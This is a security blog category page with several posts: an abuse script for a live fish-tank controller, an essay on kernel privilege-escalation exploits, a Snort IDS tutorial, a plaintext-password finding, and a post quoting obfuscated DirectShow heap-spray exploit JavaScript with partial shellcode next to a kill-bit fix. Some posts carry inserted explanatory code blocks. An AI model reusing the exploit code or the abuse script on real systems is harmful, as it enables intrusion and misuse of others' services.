nodereality

Entries in the Category “security”

Abusing Fish (For Fun, Not Profit)

written by Alan, on Jan 3, 2010 9:42:00 PM.

I have been very bored, and then yesterday Remy showed me this. Doing so was a very bad idea; let me explain why.

Tankedcam is an interactive fish tank. Backed by a servo board and a front-end webpage, you're able to press buttons to control what happens inside the tank. The live demo on the website contains a few interesting things.

  • Dino - Open/close the jaw of the dino. (I see it as a fish chomper)
  • Air Stone - A jet of bubbles. (Bubble blaster right?)
  • Flashlight - Makes things bright. (Blinds em -.-)

However, I can't press the buttons fast enough to chomp anything, and the flashlight turns off after 10 seconds. But I can abuse the programming. The webpage sends a GET request when you press one of the buttons on the controller; a session ID and timestamp are needed, but the page's own click handlers add those, so there is a very simple way around the limit: I'll use JavaScript mouse events to simulate the onclick event of the buttons and let the page build the requests for me.

A few minutes later I have a very simple script that rapidly 'clicks' the open and close buttons for the dino jaw. I added support for the other tank functions and the Fish Hack Script was finished.

One thing I have noticed: if I lower the timer, the whole servo starts to play up; maybe it can't draw enough power. :(

Anyway, have fun, the script is here (UPDATE: right click, save as; the nodereality referer has been blocked). If you catch a fish in the chomper I want a picture. There are also some snails that come out at night; they move slower. I had fun throwing one off the top of the chomper.
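The script works because the only throttling is a human's clicking speed: the session ID and timestamp are attached by the page's own handlers, so firing those handlers yields valid requests. The following is an added example (not part of the original post and not Tankedcam's code) that models both sides: the page's handlers, the rapid-click loop, and the server-side per-session token bucket that would actually stop it. The action names, session ID, request shape and limits are assumptions for the example; it runs under Node.js with no DOM, and in a browser the click loop would be `btn.dispatchEvent(new MouseEvent('click', {bubbles: true}))`.

```javascript
// Added example, not part of the original post or of Tankedcam. All names,
// limits and the request shape are assumptions made for this illustration.

// The page side: each button's onclick builds the GET parameters itself,
// so anything that fires the handler gets a well-formed request for free.
function makeController(sendRequest, sessionId, clock) {
  const button = (action) => ({
    onclick: () => sendRequest({ action, sid: sessionId, ts: clock() }),
  });
  return {
    dinoOpen: button('dino_open'),
    dinoClose: button('dino_close'),
    air: button('air'),
    light: button('light'),
  };
}

// The "hack script": fire the handlers in turn, as fast as the caller wants.
function rapidClick(buttons, times, afterEach) {
  for (let i = 0; i < times; i++) {
    buttons[i % buttons.length].onclick();
    afterEach();
  }
}

// The server side: a token bucket per session, kept in integer milli-tokens so
// the refill arithmetic is exact. The server uses its own clock; the client's
// ts parameter is never trusted for rate limiting.
class SessionRateLimiter {
  constructor(capacity, refillPerSec) {
    this.capacity = capacity * 1000;      // milli-tokens
    this.refillPerMs = refillPerSec;      // N tokens/s == N milli-tokens/ms
    this.buckets = new Map();             // sid -> { tokens, last }
  }
  allow(sid, nowMs) {
    let b = this.buckets.get(sid);
    if (!b) {
      b = { tokens: this.capacity, last: nowMs };
      this.buckets.set(sid, b);
    }
    b.tokens = Math.min(this.capacity, b.tokens + (nowMs - b.last) * this.refillPerMs);
    b.last = nowMs;
    if (b.tokens < 1000) return false;
    b.tokens -= 1000;
    return true;
  }
}

// Drive the whole thing with a simulated clock: `clicks` clicks, one every
// `intervalMs`, against a bucket of `capacity` requests refilling at `refillPerSec`.
function simulate(clicks, intervalMs, capacity, refillPerSec) {
  let now = 0;
  const limiter = new SessionRateLimiter(capacity, refillPerSec);
  let sent = 0;
  let accepted = 0;
  const send = (req) => {
    sent++;
    if (limiter.allow(req.sid, now)) accepted++;   // server clock, not req.ts
  };
  const c = makeController(send, 'sid-constructed-example', () => now);
  rapidClick([c.dinoOpen, c.dinoClose, c.air, c.light], clicks, () => { now += intervalMs; });
  return { sent, accepted };
}

// 40 clicks 50 ms apart against a 2-request bucket refilling at 1/s: 3 get through.
// 3 clicks a second apart (a human pace): all 3 get through.
const burst = simulate(40, 50, 2, 1);
const human = simulate(3, 1000, 2, 1);
```

The point of the model is that neither the session ID nor the timestamp is a control; the server has to count requests per session against its own clock, and a limit tuned to how fast a person can click leaves the normal UI untouched while the script gets mostly rejections.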

A Comparison of Local Privilege Escalation Kernel Exploits on FreeBSD and Linux

written by abstorted, on Aug 5, 2009 1:45:00 AM.

There is a direct correlation between the popularity of an operating system and the number of vulnerabilities found in it, and especially the number of publicly available exploits for those vulnerabilities. We can see this trend in the exploits available for Linux-based distributions. Other factors are definitely involved, such as quality assurance. Since FreeBSD and Linux are open source and free software, the people who contribute code and time are, for the most part, doing so because they are passionate about what they do. This is one possible reason why these types of exploits are not so frequent; in fact, at the time of writing there is only one published kernel exploit for FreeBSD. The other factor that seems to be a main contributor to code quality is the way the organization works and communicates.

The Linux development community is a loosely organized group of enthusiasts around the world who communicate almost solely by mailing lists and message boards. While this has been the reason for so much success and innovation, it has also caused problems, problems that the FreeBSD development community does not face because of its strict guidelines and assigned hierarchical structure. While this typically impedes innovation, it is one of the key reasons why FreeBSD is one of the most stable operating systems running the backbones of the Internet (http://en.wikipedia.org/wiki/FreeBSD) as well as topping the lists of highest uptimes (http://news.netcraft.com).

The code running the operating system should be one of the most important decisions when building a server or network with the intent of mitigating attacks. Choosing a minimal, hardened system (no bloat), with scrutinized open source code (the ability to see in detail what everything is doing) and years of reliability (ISPs and government agencies can testify to this) is paramount for security. With that in mind, let us look at the differences between the local privilege escalation kernel exploits available for both operating systems, and then examine how they can be used to put a system into an incorrect state.

"Local privilege escalation kernel exploit" is a mouthful, so let's break it down. Local means that the attack can only be launched from inside the machine: the attacker is either 1) physically sitting in front of it or 2) already logged in, typically through a shell such as SSH, telnet or a PHP web shell. Privilege escalation means just that: exploiting a vulnerable program, usually by running a binary crafted for the purpose, to obtain more privileges than the attacker started with. This typically involves triggering a memory-safety bug (the exploit) to move from one user's privileges to another's and so gain access to more files on the targeted system. The kernel is the core of the operating system. By itself it does nothing; in a running system it is the traffic controller, policeman and plumber for the userland processes. Because the kernel runs with full privileges, a successful kernel exploit gives the attacker root (in fact arbitrary code execution in kernel mode, which is more than root).

Putting it all together: a remote attacker logs into the machine with an unprivileged account, downloads his or her exploits and tools, runs them, and if the kernel is vulnerable ends up with root privileges on the system.

FreeBSD 7.0/7.1 (ktimer) Local Kernel Root Exploit (http://www.securityfocus.com/bid/34196) and Linux Kernel SCSI IOCTL Integer Overflow Vulnerability (http://www.securityfocus.com/bid/12198/info) are two examples, from different operating systems, of a similar class of vulnerability. The SCSI IOCTL interface is used by the Linux kernel to control SCSI hardware such as hard disks. When it is given an out-of-range integer the kernel may crash; when the input is supplied in a certain way, the attacker can control what happens instead of a crash and gain root privileges on the machine. The ktimer code in the FreeBSD kernel implements per-process timers; when one of those timers expires, certain actions are taken by the kernel. When a user passes an integer to the timer system calls, the kernel is supposed to act on the specific timer identified by that integer. The problem was that the supplied integer was not bounds checked, so an attacker-controlled index could reach memory outside the intended timer table, causing a similar problem to the Linux kernel's IOCTL vulnerability. These two are classified as an Access Validation Error and a Boundary Condition Error, respectively.

Some of the built-in protections on Unix-based systems are stack canaries (security cookies) and address space layout randomization. These, however, were generally not applied to the kernel itself at the time of writing, so kernel code gets no protection from them against these types of attacks.

Thus it is very important to have the code scrutinized down to the last detail by as many trained eyes as possible. Black-box testing methods like fuzzing can aid in discovering kernel vulnerabilities, and such methods can help find other bugs in the kernel, but the best way to correct situations like these is thorough communication and collaboration within the programming and security communities.

Installing Snort IDS and BASE on FreeBSD 7

written by abstorted, on Jul 13, 2009 12:45:00 PM.

This is a tutorial based on my experience with installing Snort IDS together with BASE to view, dissect and graph alerts. This is a very straightforward install thanks to FreeBSD's ports system. If you choose another operating system like Linux, note that you will probably have to install from source, because the packaged versions offered by package managers like aptitude are severely out of date.

Let's begin!

# Locate Snort in the FreeBSD ports tree and cd into that directory:
cd /usr/ports/security/snort
# Build and install as root (via sudo)
sudo make install clean

It will ask you a few questions in an ncurses interface; choose the database you will be using. I chose MySQL because it was already installed, but I recommend PostgreSQL for its speed and ease of use.

When it finishes compiling we need to install oinkmaster. Oinkmaster is a port that fetches the latest signatures from snort.org. Configuration instructions follow after the install.

# Locate oinkmaster and cd into its directory
cd /usr/ports/security/oinkmaster
# Build and install as root (via sudo)
sudo make install clean

Now you need to go to snort.org and register in order to receive the latest Snort rules. You will receive a hash (your "oinkcode") which you'll place in the oinkmaster configuration file, so save it. It's time to set up the configuration file for oinkmaster and then run it to receive over 500MB of definitions.

# change the name of oinkmaster.conf.sample to oinkmaster.conf
mv /usr/local/etc/oinkmaster.conf.sample /usr/local/etc/oinkmaster.conf
# open this up with your favorite editor
ee /usr/local/etc/oinkmaster.conf

Inside this configuration look for the section headed "Example for Snort-Current", uncomment the url line below it and replace the <oinkcode> placeholder with the hash you saved earlier (removing the < and > symbols as well).

The next part is where I ran into trouble. When we run oinkmaster like:

oinkmaster -o /usr/local/etc/snort/rules

I realized that there was not enough space in my /tmp directory:

[root@mysystem ~]$ df
Filesystem  1K-blocks    Used     Avail Capacity  Mounted on
/dev/ad2s1a    507630  220226    246794    47%    /
devfs               1       1         0   100%    /dev
/dev/ad2s1e    507630     164    466856     0%    /tmp
/dev/ad2s1f 146367154 9481038 125176744     7%    /usr
/dev/ad2s1d   1998574 1489084    349606    81%    /var

So I changed the directory where oinkmaster saves the tar.gz to one on a larger partition:

# change the directory if your /tmp partition is under 500MB
tmpdir = /home/someuser/snort/

Now that oinkmaster has enough room to download and extract the tarball we can run our command again:

oinkmaster -o /usr/local/etc/snort/rules

Our rules are up to date, now we need to setup a database so that Snort can save alerts and BASE can display them on the web.

# log in to MySQL as root, then create a database and a user for snort
mysql -u root -p
CREATE DATABASE `snort`;
GRANT ALL PRIVILEGES ON snort.* TO 'snort'@'localhost' IDENTIFIED BY 'somepasswordhere';

Now we populate the database with the tables and data it needs, using a script that was included with the port.

# log in to MySQL as the snort user and feed the create_mysql script into the database
mysql -u snort -p snort < /usr/local/share/examples/snort/create_mysql

There are a few more things to do to make Snort work. First we have to edit snort.conf so that it knows about our database. We also have to enable Snort at startup (rc.conf).

# open up snort.conf and configure a few settings (make sure your db settings are correct)
ee /usr/local/etc/snort/snort.conf
# uncomment the following lines (and configure them):
# config detection: search-method lowmem
# output alert_syslog: LOG_AUTH LOG_ALERT
# output database: log, mysql, user=snort password=mysnortpassword dbname=snort host=localhost

Also make sure to uncomment all the include $RULE_PATH lines, or, if you want, only the ones you wish to monitor, which increases speed but reduces the set of signatures checked.

Enable snort in rc.conf:

sudo ee /etc/rc.conf    # and add snort_enable="YES"

Let's install BASE now:

cd /usr/ports/databases/adodb; sudo make install clean
cd /usr/ports/security/base; sudo make install clean

Set up Apache to serve the directory BASE was installed in and restart Apache.

# start snort
sudo /usr/local/etc/rc.d/snort start

Log in to your BASE site, follow the instructions, and your IDS is installed.

Using Snort with BASE:

snort1

This is the BASE main screen on my server. It gives the user an easy-to-use interface for viewing the different alerts.

snort2

I find it best to view the unique alerts on this main screen and check the details of those packet captures.

snort3

Here is a display of the unique alerts. It shows the total number of times each specific alert was triggered. You can open a specific incident and view the captured packet in many different formats.

snort4

Here is a payload of the MSSQL Slammer worm. It is the most active alert on my server, however it poses no threat to me because I do not run Windows.

There are even graphing functions:

snort5

It is useful to know what is going on in your network, and Snort is an excellent tool to assist with this. However, Snort IDS will not stop attacks; it only shows what has happened. There are other tools that actually stop attacks, like Snort-Inline (with modes such as packet replace mode, which rewrites the packet data so it becomes useless).

You need to supplement your server with PF (packet filter) in order to maintain a good degree of security. Notice that there have been no alerts for port scanning: my PF configuration stops this kind of activity completely.

Other tools to increase your awareness of an incident on FreeBSD: install Tripwire, which shows what files were modified, created or deleted on your system. Some configuration changes help too, such as moving your OpenSSH server to a higher port so bots do not brute force it (this cuts the noise, but it is not a real control; disabling password authentication in favour of keys is). With some scripts and your packet filter (PF on FreeBSD, IPTables on Linux) you can blacklist IPs that make repeated brute force attempts against your server. You should also always log to a remote system, because it is very easy for an attacker to clean the local logs once he has root on your server.

Plain text from Apple

written by Alan, on Jul 11, 2009 2:37:00 AM.

This is something little I found by chance; it's not the most major of security holes, but hey, I got a plaintext password. You should never be able to get a password in plaintext... it just defeats the point, right?

Let me explain a little how this happened. I already have a Time Capsule from Apple; this is a network storage device, but it also provides routing, network address translation and Wi-Fi. However, it lacks the AirTunes option that the AirPort Express offers.

AirTunes lets you stream music over wireless to the speakers connected to the AirPort Express. But because this device also has the other features of the Time Capsule, minus the network storage, I couldn't justify buying a new AirPort Express, so I got a used one from eBay.

All is well, and I get my package in the post a few days after buying. I plug it in and open the AirPort Utility to configure the device to my needs.

Problem! The device is asking for a password... Well, OK, I must be able to factory reset this unit, and a quick Google search brings me to this support article. It tells me I should do a soft reset if I forget the password. This gives you 5 minutes to change any setting on the device without a password, including the password itself.

I do a soft reset and open the device configuration. Something I notice is that the password field has some masked characters in it, but what appeals to me more is the option to save the password in my keychain. So I check this option and change a different setting on the AirPort Express (e.g. the device name) so that the Save button is enabled.

AirPort Utility

After saving I check my keychain, and what a shock: the previous owner's AirPort Express password is there for me in plain text. The soft reset is meant to let you set a new password, but the utility hands you the old one: the password field is pre-filled with the real stored password rather than a placeholder, and the keychain option saves whatever is in that field. If you sell one of these, do a full factory reset first, and don't reuse its password anywhere else.

Keychain

Directshow exploit

written by Ghirai, on Jul 9, 2009 2:37:00 AM.

As you probably know, it's a Windows 0day in msvidctl.dll (the Microsoft Video ActiveX control). Some Chinese sites have been using it in drive-by attacks for the past 3 days or so.

Microsoft has an advisory, as well as a blog post.

The idea is that setting the kill bit for the control's CLSID stops Internet Explorer from instantiating it, which prevents the attack (.reg file):

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}] 
"Compatibility Flags"=dword:00000400

You can find variations of the snippet, according to CSIS (who supposedly discovered the exploit), all over the web:

var appllaa='0';
// builds '%u9090%u9090' (the NOP sled pattern) in pieces so it is not visible as a literal
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
// the shellcode as %uXXXX escapes; the long tail is elided ([SNIP]) on the original page
var dashell=unescape(nndx+"%u03eb%ueb59%ue805"+
 "%ufff8%uffff%u4937%u4949%u4949%u4949%u4949"+
 [SNIP]);
var headersize=20;                        // room left for the string object's own header
var omybro=unescape(nndx);                // the NOP sled unit (two 0x9090 code units)
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)           // grow the sled by doubling until it covers the slack
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000) // build a block of about 0x30000 code units (384KB)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)                        // spray 300 blocks, each a sled followed by the shellcode
memory[x]=shuishiMVP+dashell;
// instantiate the vulnerable control; DivID is an element id that IE resolves as a global
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';               // the crafted file that triggers the bug
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
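The obfuscated names hide a plain heap spray: build one large string that is almost entirely NOP sled with the shellcode at its tail, allocate hundreds of copies so that the heap is carpeted with them, then trigger the bug so that a corrupted pointer lands somewhere in a sled and slides into the shellcode. The following is an added example, not code from the original page or from the exploit it quotes: a readable model of that layout, with the same block size and count as the sample, plus a crude check for spray-shaped strings of the sort a script scanner might apply. The sled and payload are constructed placeholders (not shellcode) and every name is an assumption for the example; it runs under Node.js, and the browser-only step (instantiating the ActiveX control) is not modelled.

```javascript
// Added example, not part of the original page. Constructed placeholders only.

// unescape('%u9090') yields one UTF-16 code unit, i.e. two 0x90 (NOP) bytes in memory.
const NOP_SLED_UNIT = '\u9090';
// Stand-in for the payload: the first three code units of the sample, then filler.
const FAKE_PAYLOAD = '\u03eb\ueb59\ue805' + 'P'.repeat(40);

// One spray block: a sled of exactly (blockChars - payload.length) code units
// followed by the payload, so a jump anywhere into the sled slides into the payload.
function buildSprayBlock(sledUnit, payload, blockChars) {
  if (payload.length >= blockChars) {
    throw new RangeError('block too small to hold the payload');
  }
  const sledChars = blockChars - payload.length;
  let sled = sledUnit;
  while (sled.length < sledChars) sled += sled;   // grow by doubling, as the original does
  return sled.substring(0, sledChars) + payload;
}

// The whole spray: `count` blocks. In the original each array element is the
// result of a fresh concatenation, i.e. a separate allocation on the heap.
function buildSpray({ sledUnit, payload, blockChars, count }) {
  const block = buildSprayBlock(sledUnit, payload, blockChars);
  const blocks = [];
  for (let i = 0; i < count; i++) blocks.push(block);
  return {
    blocks,
    bytesPerBlock: blockChars * 2,           // UTF-16: two bytes per code unit
    totalBytes: count * blockChars * 2,
  };
}

// Crude spray heuristic: many large strings whose first `sampleChars` code
// units are all one repeated value. Long runs of a single character in
// ordinary data (padding, whitespace) also trip it; treat it as a signal, not proof.
function looksLikeSpray(strings, { minChars = 0x10000, minBlocks = 50, sampleChars = 4096 } = {}) {
  let suspicious = 0;
  for (const s of strings) {
    if (s.length < minChars) continue;
    const first = s.charCodeAt(0);
    let uniform = true;
    for (let i = 1; i < sampleChars && i < s.length; i++) {
      if (s.charCodeAt(i) !== first) { uniform = false; break; }
    }
    if (uniform) suspicious++;
  }
  return suspicious >= minBlocks;
}

// Same parameters as the sample above: 0x30000 code units per block, 300 blocks,
// which comes to about 112 MB of sled-plus-payload on the heap.
function sampleSpray() {
  return buildSpray({ sledUnit: NOP_SLED_UNIT, payload: FAKE_PAYLOAD, blockChars: 0x30000, count: 300 });
}
```

Two things the model makes visible that the obfuscated version hides: the payload sits at the end of every block, so the sled must be long enough that any plausible landing address inside a block is before it, and the spray's footprint (300 blocks of 0x30000 code units is roughly 112 MB) is why a page like this is slow to load and why allocation-volume heuristics catch it.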

For those of you who want to do further testing, there is a Metasploit module available, as well as a quick script to generate the GIF file directly.

For reference, here are the CVE and OSVDB links.